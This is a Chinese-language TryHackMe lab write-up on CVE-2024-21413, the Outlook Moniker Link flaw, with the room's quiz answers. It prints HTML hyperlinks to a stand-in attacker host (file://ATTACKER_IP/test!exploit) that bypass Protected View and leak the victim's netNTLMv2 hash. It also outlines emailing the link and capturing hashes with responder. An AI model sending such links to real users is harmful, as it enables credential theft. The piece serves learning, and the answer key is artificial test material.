Tryhackme — Moniker Link (CVE-2024–21413)
任务 1 — 简介
2024年2月13日,微软公布了一个Microsoft Outlook远程代码执行(RCE)及凭证泄露漏洞,分配的CVE编号为CVE-2024–21413(Moniker Link)。Check Point Research的Haifei Li被确认发现了此漏洞。
该漏洞在处理一种称为“Moniker Link”的特殊超链接时,绕过了Outlook的安全机制。攻击者可以通过向受害者发送包含恶意Moniker Link的电子邮件来利用此漏洞,一旦受害者点击该超链接,就会导致Outlook将用户的NTLM凭证发送给攻击者。
回答以下问题:
该CVE被分配的“严重性”等级是什么?
= 严重
任务 2 — Moniker Link (CVE-2024–21413)
通过在超链接中使用file://类型的Moniker Link,我们可以指示Outlook尝试访问一个文件,例如网络共享上的文件(<a href="file://ATTACKER_IP/test">Click me</a>)。此过程使用SMB协议,该协议会使用本地凭证进行身份验证。然而,Outlook的“受保护的视图”功能会捕获并阻止此尝试。
<p><a href="file://ATTACKER_MACHINE/test">Click me</a></p>
此处的漏洞在于,修改我们的超链接,在Moniker Link中包含!特殊字符和一些文本,从而绕过Outlook的“受保护的视图”。例如:<a href="file://ATTACKER_IP/test!exploit">Click me</a>.
<p><a href="file://ATTACKER_MACHINE/test!exploit">Click me</a></p>
作为攻击者,我们可以提供这种性质的Moniker Link进行攻击。请注意,远程设备上并不需要实际存在该共享,因为无论如何都会尝试进行身份验证,从而导致受害者的Windows netNTLMv2哈希值被发送给攻击者。
远程代码执行是可能的,因为Moniker Link在Windows上使用了组件对象模型。不过,对此进行解释目前超出了本房间的范围,因为尚未有公开发布的通过此特定CVE实现RCE的概念验证。
回答以下问题:
我们在超链接中使用哪种Moniker Link类型?
= file://
用于绕过Outlook“受保护的视图”的特殊字符是什么?
= !
任务 3 — 利用
数据: https://tryhackme.com/room/monikerlink
概念验证:
- 需要攻击者和受害者的电子邮件。通常,你需要使用自己的SMTP服务器(本房间已为你提供)。
- 需要密码进行身份验证。在本房间中,
attacker@monikerlink.thm的密码是attacker。 - 包含电子邮件内容 (
html_content),其中包含我们作为HTML超链接的Moniker Link。 - 然后,填写电子邮件中的“主题”、“发件人”和“收件人”字段。
- 最后,将电子邮件发送到邮件服务器。
我们在AttackBox上用来捕获用户哈希的应用程序名称是什么?
= responder
点击电子邮件中的超链接后捕获的哈希类型是什么?
= netNTLMv2
其他任务涉及新的Outlook更新,如果不看答案,你可能无法完成房间,因此答案已在任务本身中给出。
这是我的学习总结,希望对你有帮助,别忘了关注。FINISHED
CSD0tFqvECLokhw9aBeRqm5orB3AsHVzWqw5nASLxH9NbQfXT2bQPYZThKYCe4Jv48TgTN9cT+sa7UDoads3y/guN6+Q4S1LWPV/MKeUL/p6w4ps0bEExAdq59YOidx2
更多精彩内容 请关注我的个人公众号 公众号(办公AI智能小助手)
对网络安全、黑客技术感兴趣的朋友可以关注我的安全公众号(网络安全技术点滴分享)
